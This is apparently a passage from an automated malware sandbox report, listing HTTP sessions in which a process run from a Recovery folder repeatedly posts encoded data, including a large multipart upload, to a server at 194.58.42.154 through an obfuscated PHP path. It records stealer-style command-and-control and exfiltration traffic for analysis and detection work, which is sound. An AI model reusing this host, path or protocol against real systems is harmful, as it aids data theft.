                                                                  Data Raw: 0e 1e 26 1d 22 35 29 11 37 2e 0a 56 2e 29 2a 5d 3f 0a 36 11 29 3c 2c 11 33 1d 2b 1f 3f 5b 30 10 3e 2c 20 11 25 2e 34 57 23 2f 32 0f 28 0c 2a 46 0c 10 26 06 28 3d 3c 08 26 2c 3f 1d 2c 20 21 42 26 00 34 00 21 59 2d 09 37 3b 0e 5f 3c 38 1a 51 30 39 30 53 3a 00 3a 5c 27 34 31 05 34 35 2a 54 02 15 24 09 29 3d 3a 07 30 32 1a 14 31 02 11 1f 31 00 39 59 36 5a 21 5a 37 39 26 17 30 38 38 08 3c 2e 38 52 32 06 37 06 29 31 07 57 22 3d 20 50 2a 01 2c 57 00 35 57 54
                                                                  Data Ascii: &"5)7.V.)*]?6)<,3+?[0>, %.4W#/2(*F&(=<&,?, !B&4!Y-7;_<8Q090S::\'4145*T$)=:02119Y6Z!Z79&088<.8R27)1W"= P*,W5WT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.449752194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:21.328598976 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:21.674571991 CEST2512OUTData Raw: 5d 54 59 53 5f 46 57 5a 5e 5a 5a 56 50 5c 50 50 55 5f 5c 5c 54 50 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]TYS_FWZ^ZZVP\PPU_\\TPZ]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%X?5 <<_>3=>5"8?+'".#)9&483-9^/.]++
                                                                  Aug 1, 2024 04:28:22.142247915 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:22.277003050 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:22 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.449753194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:25.027564049 CEST524OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----eTwOLJhoufyL2P3BNzX1CU6eJZ78WmysxB
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 135542
                                                                  Expect: 100-continue
                                                                  Aug 1, 2024 04:28:25.395833969 CEST12360OUTData Raw: 2d 2d 2d 2d 2d 2d 65 54 77 4f 4c 4a 68 6f 75 66 79 4c 32 50 33 42 4e 7a 58 31 43 55 36 65 4a 5a 37 38 57 6d 79 73 78 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                  Data Ascii: ------eTwOLJhoufyL2P3BNzX1CU6eJZ78WmysxBContent-Disposition: form-data; name="0"Content-Type: text/plain]S\UZGW]^ZZVP^P_UW\PTPZ]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_
                                                                  Aug 1, 2024 04:28:25.401396990 CEST2472OUTData Raw: 73 30 39 46 43 49 7a 54 78 70 76 4e 30 4d 66 6d 38 73 33 50 36 6e 4d 4a 7a 48 47 54 6b 7a 5a 79 35 2b 4f 71 53 76 45 46 36 38 47 6e 34 64 71 49 79 59 48 70 4d 45 5a 72 63 52 65 42 4e 79 75 52 4c 39 71 71 37 31 71 50 65 37 63 56 76 57 39 35 43 5a
                                                                  Data Ascii: s09FCIzTxpvN0Mfm8s3P6nMJzHGTkzZy5+OqSvEF68Gn4dqIyYHpMEZrcReBNyuRL9qq71qPe7cVvW95CZq6rH69ieulhX9+T5wBLeKWWD3I8hKXGxXzaMoyitYO2eorCp4MOM29RpWF/zkJ8Gu9t8o9nzQedUMhbrstrHuIg4GDy1XkZruY5HF365qXi13IxNjvL+aN/NPKEonmdCKP1p5fGPXh1vX+faGZBChEE48gxfSu9Ar
                                                                  Aug 1, 2024 04:28:25.401439905 CEST4944OUTData Raw: 4a 71 6a 38 6d 34 4b 51 71 71 79 69 34 4f 51 37 49 4e 46 55 4f 51 64 42 71 54 52 6c 78 45 4f 73 41 6c 6d 69 55 72 44 49 66 35 4d 4e 59 6d 4b 57 31 63 43 37 4c 36 44 2f 32 54 75 43 5a 67 53 39 75 67 61 46 47 33 79 6d 52 65 68 6d 5a 54 54 2b 70 61
                                                                  Data Ascii: Jqj8m4KQqqyi4OQ7INFUOQdBqTRlxEOsAlmiUrDIf5MNYmKW1cC7L6D/2TuCZgS9ugaFG3ymRehmZTT+pa+QmDJO47+RP+vL6mLs6da2uCzcA3qQ8xpA74D0E0omoS4mSHEBi/SAABN2MBdVyF0rNDoJRo9UQ3pnpT/UydG3C3WEeMxjqYTgnNA19UB5NHo6upyCJXwXpY0C6fIfCLNKS99hXyhKhXYk9BF6PkilKasFpgcHb89
                                                                  Aug 1, 2024 04:28:25.401468992 CEST2472OUTData Raw: 4f 41 32 36 4a 4c 66 49 48 6d 54 2f 6c 6b 32 59 45 31 7a 52 32 72 68 2f 39 30 53 56 45 58 66 74 6c 38 30 41 66 66 4e 50 6c 63 79 35 74 38 38 55 79 67 6b 6b 51 49 48 35 71 48 4a 77 54 6e 75 69 6f 4b 42 65 36 75 44 74 45 78 48 49 61 52 77 64 6f 69
                                                                  Data Ascii: OA26JLfIHmT/lk2YE1zR2rh/90SVEXftl80AffNPlcy5t88UygkkQIH5qHJwTnuioKBe6uDtExHIaRwdoiN/rRJjqaxm2RyguLkfnz9y7/dS9IRORtr1MVxbCPsvgPHmbAUwojqTu3EPddjaaFp1/20B3P/6brVDbA3+Gz760bZacSdTCW+YjwcbE/O1dUf6otAHUU4rhSRA0+OQWyhccHOVyCd5+IjMqg/2rOSLeGJ0ysdqCvZ
                                                                  Aug 1, 2024 04:28:25.401525974 CEST4944OUTData Raw: 65 68 7a 6b 74 6e 2b 4f 67 6e 61 36 30 6c 36 6a 36 34 4f 70 4a 56 4c 34 34 7a 4f 35 67 6b 65 35 37 66 32 7a 35 4a 50 6b 44 4f 34 33 70 7a 78 35 4e 54 30 55 4b 46 61 52 31 54 7a 44 4a 54 71 4f 50 50 58 58 72 48 4d 31 53 38 32 45 6e 4e 67 2b 71 62
                                                                  Data Ascii: ehzktn+Ogna60l6j64OpJVL44zO5gke57f2z5JPkDO43pzx5NT0UKFaR1TzDJTqOPPXXrHM1S82EnNg+qbO7iJ/wC4nYePPQBrbXMLOVO7ARJTNoVpvOPvywI7g36I/SYOvrxoef92zQsdGxRV/t/DGspcxvmq1gt9kM7G+VVvrZHZ5Xl4POVVXEzdMIxU2IHkW1skpeo9LVYufy7U+dmJYXrIsamhPjIi+tZeS/ssv3plV6eO2
                                                                  Aug 1, 2024 04:28:25.401582003 CEST4944OUTData Raw: 4a 74 74 6a 6f 48 47 6c 6b 35 4d 2f 76 46 50 72 35 65 67 37 59 78 4a 39 44 77 34 4f 44 70 6a 7a 55 69 4e 61 79 7a 54 55 56 6a 47 44 2b 32 76 72 6c 44 53 38 63 57 74 4a 41 64 33 6d 77 68 79 53 50 33 67 37 4d 61 72 49 34 62 7a 62 55 36 47 45 6c 33
                                                                  Data Ascii: JttjoHGlk5M/vFPr5eg7YxJ9Dw4ODpjzUiNayzTUVjGD+2vrlDS8cWtJAd3mwhySP3g7MarI4bzbU6GEl32lThy6kiuviz5hPD/jgRcj861r0TjOtCGX7/Z8ruiX53s8QwW+XZT8Pk8arfAlWtfQMWes3IaeIXhoPz/A2vAk+feU2foJH1fiYyetd+4EcO6RjtVBzH0vad4lq6zxY3l5/+5bmzop53T+bxqLl3+/SbDt2tr+dOE
                                                                  Aug 1, 2024 04:28:25.401612043 CEST2472OUTData Raw: 68 52 51 4f 39 72 4b 50 39 70 44 53 6b 5a 49 67 5a 73 32 78 62 4b 78 74 31 56 61 32 48 58 66 32 66 6d 34 39 36 64 55 74 6d 42 54 7a 71 71 70 62 4b 39 64 49 53 73 74 65 44 37 68 74 4a 4e 70 49 44 67 31 77 6f 52 67 4c 37 5a 71 79 72 54 53 56 44 76
                                                                  Data Ascii: hRQO9rKP9pDSkZIgZs2xbKxt1Va2HXf2fm496dUtmBTzqqpbK9dISsteD7htJNpIDg1woRgL7ZqyrTSVDvph8N3c6mzyGLkTd3rTrBN7zQRKUcQDkVG0oE8PqMlJ1m4FpjITj9uWp4CrQ7e8cyVkAnjJOej2UKCUntukpxAuI1NumZ1sS+ZuLHQHyVROKbKsMti4qDZ0SRWQJtx7m71JlqoIgpyDaccqelFtdUO+d+8d2/MHU8G
                                                                  Aug 1, 2024 04:28:25.401639938 CEST2472OUTData Raw: 2f 4a 4a 49 45 55 76 7a 46 62 4a 6f 37 75 32 71 58 43 30 4e 6d 63 7a 36 32 49 69 37 59 44 77 77 6a 69 75 51 69 68 65 5a 6f 48 7a 65 73 32 48 51 30 4f 61 6b 64 5a 53 41 2b 2f 44 6f 44 52 76 34 45 65 6b 53 48 2f 6a 46 6a 2f 73 4f 6e 55 5a 4d 61 38
                                                                  Data Ascii: /JJIEUvzFbJo7u2qXC0Nmcz62Ii7YDwwjiuQiheZoHzes2HQ0OakdZSA+/DoDRv4EekSH/jFj/sOnUZMa87X7bb8V68c1o1X/WxsD/3OyfZybZtp2DIpnnbj15+hP3/m8j5G92zLDNKkzjCxXV/HA+e/sIMuGfG59RIWp7rOC+k10pb+KSVGVO9YMYhMFyd0SjGep3W9sN7b7LeBv3qIHjvTo8Lg/hud4re9TF/Vbb1SE7FUYZ+
                                                                  Aug 1, 2024 04:28:25.406544924 CEST2472OUTData Raw: 68 35 4b 2f 48 41 46 45 62 65 6b 36 4c 74 55 66 36 7a 42 63 75 64 4e 6c 37 44 67 36 69 4d 75 61 34 6c 6e 77 63 57 76 38 34 6e 63 45 78 77 4e 70 78 35 47 50 36 72 78 76 4e 38 51 30 70 46 72 63 6d 59 41 39 63 54 69 57 45 2b 5a 54 75 56 77 57 63 57
                                                                  Data Ascii: h5K/HAFEbek6LtUf6zBcudNl7Dg6iMua4lnwcWv84ncExwNpx5GP6rxvN8Q0pFrcmYA9cTiWE+ZTuVwWcWEylJ0yo75G7OGLkDtbj8BxmlgAR0F7UcNS7bjoy9tjX0wt9cWQH0hRiq2vF14sKcpzxXb0iXXcHjblDHG2UFYXoEj6VEBCh/uWSxr9LmsQ5WHBY2lXo2q/vy1RuvvnSSL4m0mh4PQftV+JGL0gJkyhSRfJoFiH2eP
                                                                  Aug 1, 2024 04:28:25.406925917 CEST9888OUTData Raw: 67 6b 76 4e 42 45 55 65 39 53 73 5a 6d 62 67 73 79 34 4f 41 7a 50 49 77 74 4e 42 44 43 4d 75 62 69 49 44 64 5a 53 6c 73 72 49 70 38 66 38 61 53 57 44 6b 55 6e 44 55 4c 49 63 57 6c 61 55 37 74 6b 45 78 37 35 53 44 49 4c 46 39 2b 53 69 6a 58 4f 5a
                                                                  Data Ascii: gkvNBEUe9SsZmbgsy4OAzPIwtNBDCMubiIDdZSlsrIp8f8aSWDkUnDULIcWlaU7tkEx75SDILF9+SijXOZO9ehVMFCri0fjbnj3rzBIbnWfD1w8hAv/3ZdD/dFxBfz/5LZ6QMpz7j4BB9Zd8AREJIbzKQpQJWf9fo/wsBUpCqJqTn/HliSdL+PdW+sDfM6qfSSSFElIe4B8/QluMOC8+CNbpAekCOUH/9d69cog7g8UQVZs0zpT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.449754194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:25.691045046 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:26.052145004 CEST2512OUTData Raw: 58 5f 5c 53 5f 42 57 53 5e 5a 5a 56 50 5c 50 5f 55 54 5c 5f 54 5c 5a 58 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: X_\S_BWS^ZZVP\P_UT\_T\ZXYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%^<39U#/')%=<:!?(_34U+*"4+'=9^/.]++
                                                                  Aug 1, 2024 04:28:26.481410027 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:26.615425110 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:26 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.449755194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:27.567828894 CEST478OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 1996
                                                                  Expect: 100-continue


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.449756194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:27.608748913 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:27.955836058 CEST2512OUTData Raw: 5d 55 59 53 5f 45 52 5e 5e 5a 5a 56 50 59 50 58 55 5e 5c 5d 54 58 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]UYS_ER^^ZZVPYPXU^\]TXZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%?)S ,*#==9W"+ +3=&70(Z#$'3-9^/.]+
                                                                  Aug 1, 2024 04:28:28.414266109 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:28.547703028 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:28 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.449757194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:29.038067102 CEST478OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Aug 1, 2024 04:28:29.393357992 CEST2512OUTData Raw: 58 51 5c 50 5f 47 57 5f 5e 5a 5a 56 50 57 50 59 55 50 5c 5d 54 50 5a 50 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XQ\P_GW_^ZZVPWPYUP\]TPZPYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%X)367<,]*3.><.5;<<0=5U7,R()5[ 4+$9^/.]+
                                                                  Aug 1, 2024 04:28:29.859499931 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:29.991353989 CEST151INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:29 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.449758194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:31.011619091 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:31.362543106 CEST2512OUTData Raw: 58 51 5c 54 5f 45 57 5d 5e 5a 5a 56 50 57 50 5f 55 57 5c 50 54 5f 5a 5a 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XQ\T_EW]^ZZVPWP_UW\PT_ZZYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%Y+0!R#/$_* "(,)#+0<,0.)P#;+:!7$7&=9^/.]+
                                                                  Aug 1, 2024 04:28:31.825311899 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:31.957824945 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:31 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.449759194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:32.084060907 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2504
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:32.440689087 CEST2504OUTData Raw: 5d 55 5c 51 5a 41 57 5a 5e 5a 5a 56 50 5e 50 51 55 55 5c 5b 54 51 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]U\QZAWZ^ZZVP^PQUU\[TQZ]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%Z<0=W4<(Y?#">66;](;X%=%V >U< 43-9^/.]+


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.449760194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:32.821604967 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 1960
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:33.285335064 CEST1960OUTData Raw: 5d 51 5c 53 5a 44 57 5e 5e 5a 5a 56 50 5e 50 58 55 53 5c 51 54 5f 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]Q\SZDW^^ZZVP^PXUS\QT_Z\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&+39U7<7=#_),1#+Y?;+Z$%V#.$(* ';'-9^/.]+'
                                                                  Aug 1, 2024 04:28:33.612303019 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:33.790720940 CEST380INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:33 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 152
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 0e 1e 26 53 36 1f 21 58 37 2d 30 55 3a 04 21 04 2b 23 2e 10 3d 05 20 59 27 1d 05 53 2b 3e 27 02 3d 3f 28 5b 32 3d 20 57 22 2c 21 12 29 36 2a 46 0c 10 25 59 28 13 20 09 31 01 28 0f 2d 30 31 47 26 07 37 5f 36 3f 32 50 20 5d 24 16 2b 06 3c 50 24 2a 33 08 39 58 25 06 25 51 29 01 20 35 2a 54 02 15 27 51 3d 3d 21 1d 24 22 12 17 25 2c 19 1f 26 10 21 10 22 2f 31 11 37 29 31 02 33 38 01 1b 3c 2e 0a 51 26 06 28 5f 3d 57 3e 09 22 17 20 50 2a 01 2c 57 00 35 57 54
                                                                  Data Ascii: &S6!X7-0U:!+#.= Y'S+>'=?([2= W",!)6*F%Y( 1(-01G&7_6?2P ]$+<P$*39X%%Q) 5*T'Q==!$"%,&!"/17)138<.Q&(_=W>" P*,W5WT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.449761194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:34.215106010 CEST478OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
